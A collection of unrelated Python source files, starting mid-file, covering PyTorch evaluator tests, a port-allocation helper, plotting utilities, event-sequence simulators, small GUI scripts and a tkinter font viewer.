assert (old_head_scores[~exp_head_filter_mask] == filtered_head_scores[~exp_head_filter_mask]).all()
assert not torch.isfinite(filtered_head_scores[exp_head_filter_mask]).any()
# Test tail scores
tail_scores = torch.randn(batch_size, num_entities, generator=self.generator)
old_tail_scores = tail_scores.detach().clone()
positive_filter_tails, _ = create_sparse_positive_filter_(
hrt_batch=batch,
all_pos_triples=all_pos_triples,
relation_filter=relation_filter,
filter_col=2,
)
filtered_tail_scores = filter_scores_(
scores=tail_scores,
filter_batch=positive_filter_tails,
)
# Assert in-place modification
mask = torch.isfinite(tail_scores)
assert (tail_scores[mask] == filtered_tail_scores[mask]).all()
assert not torch.isfinite(filtered_tail_scores[~mask]).any()
# Assert correct filtering
assert (old_tail_scores[~exp_tail_filter_mask] == filtered_tail_scores[~exp_tail_filter_mask]).all()
assert not torch.isfinite(filtered_tail_scores[exp_tail_filter_mask]).any()
class DummyEvaluator(Evaluator):
"""A dummy evaluator for testing the structure of the evaluation function."""
def __init__(self, *, counter: int, filtered: bool, automatic_memory_optimization: bool = True) -> None:
super().__init__(filtered=filtered, automatic_memory_optimization=automatic_memory_optimization)
self.counter = counter
def process_tail_scores_(
self,
hrt_batch: MappedTriples,
true_scores: torch.FloatTensor,
scores: torch.FloatTensor,
dense_positive_mask: Optional[torch.FloatTensor] = None,
) -> None: # noqa: D102
self.counter += 1
def process_head_scores_(
self,
hrt_batch: MappedTriples,
true_scores: torch.FloatTensor,
scores: torch.FloatTensor,
dense_positive_mask: Optional[torch.FloatTensor] = None,
) -> None: # noqa: D102
self.counter -= 1
def finalize(self) -> MetricResults: # noqa: D102
return RankBasedMetricResults(
mean_rank=self.counter,
mean_reciprocal_rank=None,
adjusted_mean_rank=None,
hits_at_k=dict(),
)
def __repr__(self): # noqa: D105
return f'{self.__class__.__name__}(losses={self.losses})'
class MockModel(EntityRelationEmbeddingModel):
"""A dummy model returning fake scores."""
def __init__(self, triples_factory: TriplesFactory):
super().__init__(triples_factory=triples_factory)
num_entities = self.num_entities
self.scores = torch.arange(num_entities, dtype=torch.float)
def _generate_fake_scores(self, batch: torch.LongTensor) -> torch.FloatTensor:
"""Generate fake scores s[b, i] = i of size (batch_size, num_entities)."""
batch_size = batch.shape[0]
batch_scores = self.scores.view(1, -1).repeat(batch_size, 1)
assert batch_scores.shape == (batch_size, self.num_entities)
return batch_scores
def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
return self._generate_fake_scores(batch=hrt_batch)
def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
return self._generate_fake_scores(batch=hr_batch)
def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
return self._generate_fake_scores(batch=rt_batch)
def reset_parameters_(self) -> Model: # noqa: D102
pass # Not needed for unittest
class TestEvaluationStructure(unittest.TestCase):
"""Tests for testing the correct structure of the evaluation procedure."""
def setUp(self):
"""Prepare for testing the evaluation structure."""
self.counter = 1337
self.evaluator = DummyEvaluator(counter=self.counter, filtered=True, automatic_memory_optimization=False)
self.triples_factory = Nations().training
self.model = MockModel(triples_factory=self.triples_factory)
def test_evaluation_structure(self):
"""Test if the evaluator has a balanced call of head and tail processors."""
eval_results = self.evaluator.evaluate(
model=self.model,
mapped_triples=self.triples_factory.mapped_triples,
batch_size=1,
use_tqdm=False,
)
assert eval_results.mean_rank == self.counter, 'Should end at the same value as it started'
|
# -*- coding: utf-8 -*-
import socket
from threading import Lock
def public_ipv4():
"""
take first public interface
sorted by getaddrinfo - see RFC 3484
should have the real public IPv4 address as first address.
At the moment the test layer is not able to handle v6 addresses
"""
for addrinfo in socket.getaddrinfo(socket.gethostname(), None):
if addrinfo[1] in (socket.SOCK_STREAM, socket.SOCK_DGRAM) and addrinfo[0] == socket.AF_INET:
return addrinfo[4][0]
class PortPool(object):
"""
Pool that returns a unique available port
reported by the kernel.
"""
MAX_RETRIES = 10
def __init__(self):
self.ports = set()
self.lock = Lock()
def bind_port(self, addr, port):
sock = socket.socket()
sock.bind((addr, port))
port = sock.getsockname()[1]
try:
sock.shutdown(socket.SHUT_RDWR)
except Exception:
# ok, at least we know that the socket is not connected
pass
sock.close()
return port
def random_available_port(self, addr):
return self.bind_port(addr, 0)
def get(self, addr='127.0.0.1'):
retries = 0
port = self.random_available_port(addr)
with self.lock:
while port in self.ports:
port = self.random_available_port(addr)
retries += 1
if retries > self.MAX_RETRIES:
raise OSError("Could not get free port. Max retries exceeded.")
self.ports.add(port)
return port
def get_range(self, addr='127.0.0.1', range_size=1):
retries = 0
while True:
port_start = self.get(addr)
port_end = port_start + range_size + 1
with self.lock:
loop_continue = False
for i in range(port_start + 1, port_end):
if i in self.ports:
loop_continue = True
break
if (loop_continue):
continue
try:
for i in range(port_start, port_end):
self.bind_port(addr, i)
self.ports.add(i)
break
except Exception:
retries += 1
if retries > self.MAX_RETRIES:
raise OSError("Could not get free port range. Max retries exceeded.")
continue
return "{}-{}".format(port_start, port_end - 1)
GLOBAL_PORT_POOL = PortPool()
|
# -*- coding: utf8 -*-
"""
This is part of shot detector.
Produced by w495 at 2017.05.04 04:18:27
"""
from __future__ import absolute_import, division, print_function
from .base_shot_detector import BaseShotDetector
class CommonDetector(BaseShotDetector):
"""
...
"""
pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 3rd party imports
from matplotlib.transforms import TransformedBbox, blended_transform_factory
from mpl_toolkits.axes_grid1.inset_locator import (BboxPatch, BboxConnector,
BboxConnectorPatch)
__author__ = "Louis Richard"
__email__ = "louisr@irfu.se"
__copyright__ = "Copyright 2020-2021"
__license__ = "MIT"
__version__ = "2.3.7"
__status__ = "Prototype"
def _connect_bbox(bbox1, bbox2, loc1a, loc2a, loc1b, loc2b, prop_lines,
prop_patches: dict = None):
if prop_patches is None:
prop_patches = {**prop_lines, "alpha": prop_lines.get("alpha", 1) * 0}
connector_a = BboxConnector(bbox1, bbox2, loc1=loc1a, loc2=loc2a,
**prop_lines)
connector_a.set_clip_on(False)
connector_b = BboxConnector(bbox1, bbox2, loc1=loc1b, loc2=loc2b,
**prop_lines)
connector_b.set_clip_on(False)
bbox_patch1 = BboxPatch(bbox1, **prop_patches)
bbox_patch2 = BboxPatch(bbox2, **prop_patches)
connector_patch = BboxConnectorPatch(bbox1, bbox2, loc1a=loc1a,
loc2a=loc2a, loc1b=loc1b,
loc2b=loc2b, **prop_patches)
connector_patch.set_clip_on(False)
return connector_a, connector_b, bbox_patch1, bbox_patch2, connector_patch
def zoom(ax1, ax2, **kwargs):
r"""Similar to zoom_effect01. The xmin & xmax will be taken from the
ax1.viewLim.
Parameters
----------
ax1 : matplotlib.pyplot.subplotsaxes
Reference axes.
ax2 : matplotlib.pyplot.subplotsaxes
Connected axes.
Other Parameters
----------------
**kwargs
Keyword arguments control the BboxPatch.
Returns
-------
ax1 : matplotlib.pyplot.subplotsaxes
Reference axis.
ax2 : matplotlib.pyplot.subplotsaxes
Connected axis.
"""
tt = ax1.transScale + (ax1.transLimits + ax2.transAxes)
trans = blended_transform_factory(ax2.transData, tt)
bbox_1 = ax1.bbox
bbox_2 = TransformedBbox(ax1.viewLim, trans)
c1, c2, p1, p2, p = _connect_bbox(bbox_1, bbox_2, loc1a=2, loc2a=3,
loc1b=1, loc2b=4, prop_lines=kwargs)
ax1.add_patch(p1)
ax2.add_patch(p2)
ax2.add_patch(c1)
ax2.add_patch(c2)
ax2.add_patch(p)
return ax1, ax2
|
def test_concurrent_fixture(testdir):
testdir.makepyfile("""
import pytest
import time
from six import print_
@pytest.fixture
def driver(request):
fn_name = request.function.__name__
if fn_name == 'test_1':
time.sleep(.05)
print_('before sleep', fn_name)
time.sleep(.1)
print_('after sleep', fn_name)
def after():
print_('after test', fn_name)
request.addfinalizer(after)
def test_0(driver):
print_('inside test_0')
time.sleep(.2)
def test_1(driver):
print_('inside test_1')
""")
result = testdir.runpytest_subprocess(
'-s',
'--tests-per-worker=2'
)
result.stdout.fnmatch_lines([
'pytest-parallel: 1 worker (process), 2 tests per worker (threads)',
'*before sleep test_0',
'*before sleep test_1',
'*after sleep test_0',
'*inside test_0',
'*after sleep test_1',
'*inside test_1',
'*after test test_1',
'*after test test_0'
])
result.assert_outcomes(passed=2)
assert result.ret == 0
|
import torch.nn as nn
import torch
from ..modeling.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d
def init_params(models, mode='xv'):
assert mode in {'xv', 'net2net'}
if not isinstance(models, list):
models = [models]
for model in models:
for m in model.modules():
if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d)):
if mode == 'net2net':
m_in_channels = m.in_channels
assert m_in_channels == m.out_channels and m.kernel_size[0] == 1
m.weight.data.copy_(torch.eye(m_in_channels).view(m_in_channels, m_in_channels, 1, 1))
else:
nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0) if (m.bias is not None) else None
elif isinstance(m, nn.Linear):
if mode == 'xv':
nn.init.xavier_normal_(m.weight)
elif mode == 'net2net':
m.weight.data.copy_(torch.eye(m.out_features))
m.bias.data.fill_(0) if (m.bias is not None) else None
elif isinstance(m, (SynchronizedBatchNorm2d, nn.BatchNorm2d)):
m.weight.data.fill_(1)
m.bias.data.fill_(0) |
def parse_delaunay(fname):
import h5py
import numpy
res = {}
with h5py.File(fname,'r+') as f:
for field in f:
res[field] = numpy.array(f[field])
res['facets'] = numpy.reshape(res['triangles'],(-1,3))
return res
def locate_point(x_list, y_list, xp, yp, tol = 1e-10):
import numpy
d_list = (x_list-xp)**2 + (y_list-yp)**2
assert(numpy.min(d_list)<tol)
return numpy.argmin(d_list)
def is_boxed(x, y, offset=0):
return 1-offset>=x>=0+offset and 1-offset>=y>=0+offset
def main():
import os
#import pylab
import numpy
import re
import glob
if os.path.isfile('serial_ignore.txt'):
return True
whole = parse_delaunay('whole.h5')
parts = [parse_delaunay(fname) for fname in
sorted(glob.glob('part_*.h5'),
key=
lambda x: int(re.search(r'part_(\d+).h5',x).group(1)))]
whole['sorted facets'] = [sorted(itm) for itm in whole['facets']]
for n, part in enumerate(parts):
index_table = [
locate_point(
whole['x_coordinate'],
whole['y_coordinate'],
x,y) if is_boxed(x,y)
else -1
for x,y in
zip(part['x_coordinate'],part['y_coordinate'])]
for facet in part['facets']:
if numpy.all([itm<part['point number'] for itm in facet]):
t_facet = sorted([index_table[itm] for itm in facet])
if not t_facet in whole['sorted facets']:
return False
elif numpy.all(
[is_boxed(part['x_coordinate'][itm],
part['y_coordinate'][itm],0.04)
for itm in facet]) and numpy.any([itm<part['point number'] for itm in facet]):
t_facet = sorted([index_table[itm] for itm in facet])
if not t_facet in whole['sorted facets']:
return False
return True
if __name__ == '__main__':
import os
os.system('rm *.res;')
if main():
os.system('touch test_passed.res')
else:
os.system('touch test_failed.res')
|
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import util
import copy
def merge(a, b, idx=None):
i = 0
j = 0
n = len(a)
m = len(b)
c = []
while i < n and j < m:
if a[i] <= b[j]:
c.append(a[i])
if idx is not None:
idx.append(0)
i += 1
else:
c.append(b[j])
if idx is not None:
idx.append(1)
j += 1
if i < n:
c.extend(a[i:])
if idx is not None:
idx.extend([0]*len(a[i:]))
elif j < m:
c.extend(b[j:])
if idx is not None:
idx.extend([1]*len(b[j:]))
return c
class MJPSim:
def __init__(self, q, param):
self.q = q
self.param = param
def sim(self, t_max, dt):
vt_z, vz = self.sim_mjp(t_max=t_max)
vt_event, lambda_x, t_x = self.sim_target(self.param, vt_z, vz, t_max=t_max, dt=dt)
return {
'start': 0,
'stop': t_max,
'time_context': vt_z,
'mark_context': vz,
'time_target': vt_event,
'mark_target': np.ones_like(vt_event, dtype=np.int32),
'lambda_x': lambda_x,
't_x': t_x,
}
def sim_mjp(self, t_max):
q = self.q
m = q.shape[0]
assert(np.all(np.sum(q, axis=1) == 0))
states = np.arange(0, m)
stay = np.diag(q)
trans = q.copy()
np.fill_diagonal(trans, 0)
trans = trans / np.sum(trans, axis=1)
vt_z = [0]
vz = [0]
s = 0
t = 0
while True:
t += np.random.exponential(-1/stay[s])
if t <= t_max:
s = np.random.choice(states, p=trans[s,:])
vt_z.append(t)
vz.append(s)
else:
break
return np.array(vt_z), np.array(vz, dtype=np.int32)
def sim_target(self, param, vt_z, vz, t_max, dt):
raise NotImplementedError
def sim_next(self, lambda_t, lambda_max, t_beg, t_end):
t_next = t_beg
while True:
t_next += np.random.exponential(1 / lambda_max)
if (t_next > t_end) or (np.random.uniform() * lambda_max <= lambda_t(t_next)):
return t_next
class PoisMJPSim(MJPSim):
def sim_target(self, lambda_, vt_z, vz, t_max, dt):
t_x = np.arange(dt, t_max, dt)
lambda_x = np.zeros_like(t_x)
t = 0
vt_event=[]
vt_z = np.append(vt_z, t_max)
for k in range(len(vt_z)-1):
t_l = vt_z[k + 1]
lambda_x[(t_x > t) & (t_x <= t_l)] = lambda_[vz[k]]
lambda_t = lambda t: lambda_[vz[k]]
lambda_max = lambda_[vz[k]]
while True:
t = self.sim_next(lambda_t, lambda_max, t, t_l)
if t <= t_l:
vt_event.append(t)
else:
break
t = t_l
vt_event = np.array(vt_event)
return vt_event, lambda_x, t_x
class PoisSinMJPSim(MJPSim):
def sim_target(self, param, vt_z, vz, t_max, dt):
t_x = np.arange(dt, t_max, dt)
lambda_x = np.zeros_like(t_x)
t = 0
vt_event=[]
vt_z = np.append(vt_z, t_max)
for k in range(len(vt_z)-1):
t_l = vt_z[k + 1]
idx = (t_x > t) & (t_x <= t_l)
lambda_t = lambda t: param[vz[k]] * (1+np.sin(t))
lambda_x[idx] = lambda_t(t_x[idx])
lambda_max = param[vz[k]]
while True:
t = self.sim_next(lambda_t, lambda_max, t, t_l)
if t <= t_l:
vt_event.append(t)
else:
break
t = t_l
vt_event = np.array(vt_event)
return vt_event, lambda_x, t_x
class GamMJPSim(MJPSim):
def sim_target(self, param, vt_z, vz, t_max, dt):
t_x = np.arange(dt, t_max, dt)
lambda_x = np.zeros_like(t_x)
t = 0
t_prev = 0
vt_event = []
vt_z = np.append(vt_z, t_max)
lambda_event = []
for k in range(len(vt_z)-1):
a = param[vz[k],0]
b = 1/param[vz[k],1]
step = a*b
if vt_z[k+1] - t - step < 10*dt:
t_l = vt_z[k+1]
else:
t_l = t+step
while True:
idx = (t_x > t) & (t_x <= t_l)
def lambda_t(t):
return stats.gamma.pdf(t - t_prev, a, scale=b) / stats.gamma.sf(t - t_prev, a, scale=b)
lambda_x[idx] = lambda_t(t_x[idx])
if a >= 1:
lambda_max = lambda_t(t_l)
else:
lambda_max = lambda_t(t)
assert(lambda_max < np.inf)
if lambda_max == 0: # avoid overflow in exponential
t = t_l + 1
else:
t = self.sim_next(lambda_t, lambda_max, t, t_l)
if t <= t_l:
vt_event.append(t)
lambda_event.append(lambda_t(t))
t_prev = t
elif t_l >= vt_z[k + 1]:
break
else:
t = t_l
if vt_z[k+1] - t - step < 10*dt:
t_l = vt_z[k+1]
else:
t_l = t+step
t = t_l
vt_event = np.array(vt_event)
lambda_event = np.array(lambda_event)
t_x = np.concatenate((t_x, vt_event))
lambda_x = np.concatenate((lambda_x, lambda_event))
idx = np.argsort(t_x)
t_x = t_x[idx]
lambda_x = lambda_x[idx]
return vt_event, lambda_x, t_x
class OmissSim:
def __init__(self, w, rate_omiss=0.1, regulator=None):
# regulator is a function which changes the rate over time
self.rate_omiss = rate_omiss
self.w = w
self.regulator = regulator
def sim(self, seq):
vt_event = seq['time_target']
t_max = seq['stop']
t_min = seq['start']
vt_event, vt_omiss = self.sim_omiss(vt_event, t_min)
vt_test = self.gen_test(vt_event, t_min, t_max)
vlabel = self.gen_label(vt_test, vt_event, vt_omiss)
seq = seq.copy()
seq.update({
'time_target': vt_event,
'mark_target': np.ones_like(vt_event, dtype=np.int32),
'time_test': vt_test,
'label_test': vlabel,
'time_omiss': vt_omiss,
'mark_omiss': np.ones_like(vt_omiss, dtype=np.int32),
})
return seq
def sim_omiss(self, vt_event, t_min):
n = len(vt_event)
if self.regulator is None:
rate = self.rate_omiss
else:
rate = self.rate_omiss * self.regulator(vt_event)
trials = np.random.binomial(1, rate, n)
# always keep the event at t_min
if vt_event[0] == t_min:
trials[0] = 0
idx_omiss = np.nonzero(trials)
vt_omiss = vt_event[idx_omiss]
vt_event_left = np.delete(vt_event, idx_omiss)
return vt_event_left, vt_omiss
def gen_test(self, vt_event, t_min, t_max):
w = self.w
vt_test = []
vt = vt_event
# we ignore events at t_min but keep events at t_max
if len(vt) > 0 and vt[0] == t_min:
vt = np.concatenate((vt, [t_max]))
else:
vt = np.concatenate(([t_min], vt, [t_max]))
n = len(vt)
for i in range(n-1):
t = vt[i]
vt_test.append(vt[i])
while vt[i+1] > t + w:
t_next = t + np.random.uniform(0, w)
vt_test.append(t_next)
t = t_next
vt_test = np.array(vt_test)
return vt_test
def gen_label(self, vt, vt_event, vt_omiss):
n = len(vt)
vlabel = np.zeros(n-1)
for i in range(n-1):
t_beg = vt[i]
t_end = vt[i+1]
if i == 0:
vlabel[i] = np.any((vt_omiss >= t_beg) & (vt_omiss <= t_end))
else:
vlabel[i] = np.any((vt_omiss > t_beg) & (vt_omiss <= t_end))
return vlabel
class CommissSim:
def __init__(self, rate=0.1, shrink=1, regulator=None):
self.rate = rate
self.shrink = shrink
self.regulator = regulator
def sim(self, seq):
vt_event = seq['time_target']
t_max = seq['stop']
t_min = seq['start']
vt_event, vlabel = self.sim_commiss(vt_event, t_min, t_max)
# skip the event at t_min
vt_test = vt_event
if vt_test[0] == t_min and vlabel[0] == 0:
vt_test = vt_test[1:]
vlabel = vlabel[1:]
# padding
vt_test = np.concatenate(([t_min], vt_test))
seq = seq.copy()
seq.update({
'time_target': vt_event,
'mark_target': np.ones_like(vt_event, dtype=np.int32),
'time_test': vt_test,
'label_test': vlabel,
})
return seq
def sim_commiss(self, vt_event, t_min, t_max):
rate = self.rate
shrink = self.shrink
if shrink < 1:
inter_event = np.diff(np.concatenate((vt_event, [t_max])))
inter_event *= shrink
total_inter_event = inter_event.sum()
m = np.random.poisson(total_inter_event * rate, 1)
vt_commiss = np.random.uniform(0, total_inter_event, m)
cum_inter_event = np.cumsum(inter_event)
for i in range(m):
j = np.argwhere(cum_inter_event > vt_commiss[i])[0]
if j > 0:
tmp = vt_commiss[i] - cum_inter_event[j-1]
else:
tmp = vt_commiss[i]
tmp += vt_event[j]
assert(tmp >= vt_event[0])
vt_commiss[i] = tmp
else:
m = np.random.poisson((t_max - t_min) * rate, 1)
vt_commiss = np.random.uniform(t_min, t_max, m)
if self.regulator is not None:
p = self.regulator(vt_commiss)
keep = (np.random.binomial(1, p) > 0)
vt_commiss = vt_commiss[keep]
vt_commiss = np.sort(vt_commiss)
vlabel = []
vt_event = np.array(merge(vt_event, vt_commiss, vlabel))
vlabel = np.array(vlabel)
assert(util.is_sorted(vt_event))
return vt_event, vlabel
def compute_empirical_rate(seqs):
t = 0
n = 0
for seq in seqs:
t += seq['stop'] - seq['start']
n += len(seq['time_target'])
return n/t
def sim_data_test_omiss(data_train, data_test, p=0.1, seed=0, regulator=None, regulator_generator=None):
# generate test_omiss
np.random.seed(seed)
data_test_omiss = copy.deepcopy(data_test)
n_test = len(data_test)
w = 2 / compute_empirical_rate(data_train)
if regulator_generator is None:
omiss_sim = OmissSim(w, p, regulator=regulator)
for i in range(n_test):
data_test_omiss[i] = omiss_sim.sim(data_test_omiss[i])
else:
for i in range(n_test):
regulator = regulator_generator()
omiss_sim = OmissSim(w, p, regulator=regulator)
data_test_omiss[i] = omiss_sim.sim(data_test_omiss[i])
return data_test_omiss
def sim_data_test_commiss(data_train, data_test, alpha=0.1, seed=0, regulator=None, regulator_generator=None):
# generate test_commiss
np.random.seed(seed)
data_test_commiss = copy.deepcopy(data_test)
n_test = len(data_test)
rate = compute_empirical_rate(data_test)
if regulator_generator is None:
commiss_sim = CommissSim(alpha * rate, 1, regulator=regulator)
for i in range(n_test):
data_test_commiss[i] = commiss_sim.sim(data_test_commiss[i])
else:
for i in range(n_test):
regulator = regulator_generator()
commiss_sim = CommissSim(alpha * rate, 1, regulator=regulator)
data_test_commiss[i] = commiss_sim.sim(data_test_commiss[i])
return data_test_commiss
def create_rand_pc_regulator(step, t_min, t_max):
m = np.floor((t_max - t_min) / step).astype(int)
p = np.random.uniform(size=m)
def regulator(t):
i = np.floor((t - t_min) / step).astype(int)
return p[i]
return regulator
def sparse_rand_pc_regulator(t, step):
i = np.floor(t / step).astype(int)
u = np.unique(i)
p = np.random.uniform(size=len(u))
r = np.zeros_like(t)
for k, v in enumerate(u):
r[i == v] = p[k]
return r
def plot_events(seq):
vt_event = seq['time_target']
lambda_x = seq['lambda_x']
t_x = seq['t_x']
vt_omiss = seq.get('time_omiss')
scale = 0.25 * np.max(lambda_x)
plt.figure()
if vt_omiss is None:
vlabel = seq.get('label_test')
if vlabel is None:
plt.plot(t_x,lambda_x)
plt.stem(vt_event, scale*np.ones_like(vt_event), 'k-', 'ko')
else:
plt.plot(t_x,lambda_x)
plt.stem(vt_event[vlabel==0], scale*np.ones_like(vt_event[vlabel==0]), 'k-', 'ko')
if any(vlabel):
plt.stem(vt_event[vlabel==1], scale*np.ones_like(vt_event[vlabel==1]), 'r-', 'ro')
else:
plt.plot(t_x,lambda_x)
if len(vt_event) > 0:
plt.stem(vt_event, scale*np.ones_like(vt_event), 'k-', 'ko')
if len(vt_omiss) > 0:
plt.stem(vt_omiss, scale*np.ones_like(vt_omiss), 'r-', 'ro')
if __name__=='__main__':
# t_max = 100
# dt = 0.01
# q = np.array([
# [-0.1, 0.05, 0.05],
# [0.05, -0.1, 0.05],
# [0.05, 0.05, -0.1]
# ])
# param = np.array([.1, .1, .2])
# w = 2 / np.max(param)
# pois_sim = PoisMJPSim(q, param)
# seq = pois_sim.sim(t_max, dt)
# plot_events(seq)
# omiss_sim = OmissSim(w, 0.1)
# seq_omiss = omiss_sim.sim(seq)
# plot_events(seq_omiss)
# commiss_sim = CommissSim(shrink=1)
# seq_commiss = commiss_sim.sim(seq)
# plot_events(seq_commiss)
# plt.show()
t_max = 100
dt = 0.01
q = np.array([
[-0.1, 0.05, 0.05],
[0.05, -0.1, 0.05],
[0.05, 0.05, -0.1]
])
param = np.array([.1, .2, .3])
w = 2 / np.max(param)
# regulator = lambda t: (1 + np.sin(t/100*2*np.pi))/2
regulator = create_rand_pc_regulator(20, 0, t_max)
# regulator = lambda t: sparse_rand_pc_regulator(t, 20)
x = np.arange(0, t_max, dt)
y_reg = regulator(x)
pois_sim = PoisSinMJPSim(q, param)
seq = pois_sim.sim(t_max, dt)
plot_events(seq)
omiss_sim = OmissSim(w, 0.9)
seq_omiss = omiss_sim.sim(seq)
plot_events(seq_omiss)
omiss_sim = OmissSim(w, 1, regulator=regulator)
seq_omiss = omiss_sim.sim(seq)
plot_events(seq_omiss)
plt.plot(x, y_reg, 'g--')
rate = compute_empirical_rate(([seq]))
commiss_sim = CommissSim(rate=0.9*rate)
seq_commiss = commiss_sim.sim(seq)
plot_events(seq_commiss)
commiss_sim = CommissSim(rate=1*rate, regulator=regulator)
seq_commiss = commiss_sim.sim(seq)
plot_events(seq_commiss)
plt.plot(x, y_reg, 'g--')
plt.show()
# t_max = 100
# dt = 0.01
# q = np.array([
# [-0.05, 0.05],
# [0.05, -0.05]
# ])
# param = np.array([
# [100., 10.],
# [50., 10.]])
# w = 2 * np.min(param[:,0]/param[:,1])
# gam_sim = GamMJPSim(q, param)
# seq = gam_sim.sim(t_max, dt)
# plot_events(seq)
# plt.vlines(seq['time_context'], 0, np.max(seq['lambda_x']), linestyles='dashed')
# omiss_sim = OmissSim(w, 0.1)
# seq_omiss = omiss_sim.sim(seq)
# plot_events(seq_omiss)
# commiss_sim = CommissSim(shrink=1)
# seq_commiss = commiss_sim.sim(seq)
# plot_events(seq_commiss)
# plt.show()
|
#!/usr/bin/env python3
import PySimpleGUI as sg
# This example would work great as A desktop
# double-click executable in windows. Just
# create shortcut(send-to Desktop) this file,
# and run it using pythonw.exe(no prompt) instead
# of python.exe(or open-with).
# Change default in files properties.
# Two arguments are two rows(Works as paragraphs with '\n').
# Should apply for other elements.
sg.Popup('One 1', 'Two\nTwo.One')
exit(0)
|
"""phial Slack Bot."""
from phial.bot import Phial
from phial.globals import command
from phial.scheduler import Schedule
from phial.wrappers import Attachment, Message, PhialResponse, Response
__version__ = "0.10.1"
__all__ = [
"Phial",
"command",
"Response",
"Attachment",
"Schedule",
"Message",
"PhialResponse",
]
|
from CGSearchRace.Unit import Unit
class Checkpoint(Unit):
def __init__(self, x, y):
super().__init__(x, y)
|
from . import sparsematrix
import numpy as np
import numpy.random as npr
import scipy as sp
import scipy.sparse
from . import simplefac
import sys
import tensorflow as tf
def test_sparse():
A=npr.randn(30,42)
A[npr.randn(*A.shape)>0]=0
A=sp.sparse.csr_matrix(A)
A2=sparsematrix.SparseMatrix.from_scipy_sparse(A)
assert np.allclose(A2[:],A.todense())
assert np.allclose(A2[2:7],A.todense()[2:7])
assert np.allclose(A2.T[2:7],A.todense().T[2:7])
def test_sample_sparse(kind='bernoulli'):
model=simplefac.example_model(700,800,5,kind,mag=1,sigmultiplier=.001,dtype=tf.float32)
tf.random.set_seed(0)
a=model.posterior_predictive_sample(sparse=True)
tf.random.set_seed(0)
b=model.posterior_predictive_sample(sparse=False)
def test_simplefac(kind,Nk=2):
model=simplefac.example_model(20,30,Nk,kind,mag=1,sigmultiplier=.01)
data=model.posterior_predictive_sample()
data_tf=sparsematrix.to_tensorflow(data)
model2=simplefac.initialize(data,Nk,kind)
def check(nm):
loss=model2.loss(data_tf)['loss']
getattr(model2,'update_'+nm)(data_tf)
loss2=model2.loss(data_tf)['loss']
assert loss2<=loss
check('thetas')
check('prior_cols')
check('prior_rows')
check('rows')
check('cols')
|
"""
フォントリスト表示
"""
import tkinter as tk
from tkinter.constants import HORIZONTAL, VERTICAL
import tkinter.font
import sys
class FontLib():
"""
フォントリスト表示用クラス
"""
def __init__(self, text:str="sample サンプル ", font_size:int=14) -> None:
"""
コンストラクタ
Args:
str: 出力文字
int: 文字のフォントサイズ
"""
self.root = tk.Tk()
self.root.geometry("800x600") # サイズ
self.fonts = tk.font.families() # tkが管理しているフォントのリストを取得
self.text = text # 表示文字列の設定
self.MAX_ROWS = 25 # 行数のデフォルト
self.MAX_COLUMN = 4 # 列数のデフォルト
self.FONT_SIZE = font_size # フォントサイズの設定
# スクロールバー付Frameの作成(Canvasにスクロールバーを付けて)
self.canvas = tk.Canvas(self.root) # Canvasをrootに作成
self.frame = tk.Frame(self.canvas) # Frame をCanvasに作成
self.vsb = tk.Scrollbar(self.root, orient=VERTICAL, command=self.canvas.yview) # 縦スクロールバーをrootに作成
self.hsb = tk.Scrollbar(self.root, orient=HORIZONTAL, command=self.canvas.xview) # 横スクロールバーをrootに作成
self.canvas.configure(yscrollcommand=self.vsb.set) # 縦スクロールバーの動作をCanvasに設定
self.canvas.configure(xscrollcommand=self.hsb.set) # 横スクロールバーの動作をCanvasに設定
# pack スクロールバーは先にpackする
self.hsb.pack(side="bottom", fill="x")
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left", fill="both", expand=True)
# canvasにウィジェットを配置
self.canvas.create_window((0,0), window=self.frame, anchor="nw")
def font_list_by_label(self) -> None:
"""
1.familiesを対象、ラベルで実装
"""
for i, font_name in enumerate(self.fonts):
# ラベルの作成 フォントは先にFontオブジェクトを作成してfontオプションで指定
font_ = tkinter.font.Font(self.root, family=font_name, size=self.FONT_SIZE)
label = tk.Label(self.frame, text=f"{self.text} {font_name}", font=font_)
# grid
# 最大行を指定して1列目から配置
# label.grid(row=i % self.MAX_ROWS, column=i // self.MAX_ROWS, sticky="w")
# 最大列を指定して1行目から配置
label.grid(row=i // self.MAX_COLUMN, column=i % self.MAX_COLUMN, sticky="w")
# Frameの大きさを確定してCanvasにスクロール範囲を設定
self.frame.update_idletasks()
self.canvas.config(scrollregion=self.canvas.bbox("all"))
def font_list_radiobutton(self) -> None:
"""
2.familiesを対象、ラジオボタンで実装
ScrolledFrameを使用
"""
from tkinter_libs import ScrolledFrame
# ScrolledFrameを使うため既にできているroot以下のウィジェットを削除
for w in self.root.winfo_children():
w.destroy()
# ScrolledFrame
self.frame = ScrolledFrame(self.root, has_h_bar=True, background="ivory")
self.frame.parent_frame.pack(fill="both", expand=True)
self.var_radio = tk.IntVar(value=0) # self.にしないとマウス移動で全選択になってしまう
for i, font_name in enumerate(self.fonts):
# ラジオボタンの作成 フォントはfontオプションで直に指定
rb = tk.Radiobutton(self.frame, text=f"{self.text} {font_name}",
font=(font_name, self.FONT_SIZE), variable=self.var_radio, value=i)
# grid
# 最大行を指定して1列目から配置
rb.grid(row=i % self.MAX_ROWS, column=i // self.MAX_ROWS, sticky="w")
# 最大列を指定して1行目から配置
# rb.grid(row=i // self.MAX_COLUMN, column=i % self.MAX_COLUMN, sticky="w")
def font_list_from_dir(self):
"""
3.fontsフォルダを対象にpillowのtruetypeで実装
"""
import glob, os
from PIL import ImageFont
# windowsのフォントフォルダの取得
windir = os.environ.get("WINDIR")
files = glob.glob(windir + r"\fonts\*")
for i, file in enumerate(files):
basename = os.path.basename(file)
try:
img_font = ImageFont.truetype(file, 24)
except:
# pillowの対象外のファイルを除く
# print(f"path:{basename}")
pass
else:
font_name = img_font.getname()[0]
font_ = tkinter.font.Font(self.root, family=font_name, weight="bold")
# getnameのfamilyの日本語が文字化けするのでactualに置き換える
font_name = font_.actual("family")
# フォント名、フォントファイル名、サンプル文字、フォント名でのサンプルをラベルで出力
tk.Label(self.frame, text=font_name).grid(row=i, column=1, sticky="w")
tk.Label(self.frame, text=basename, bg="yellow").grid(row=i, column=2, sticky="w")
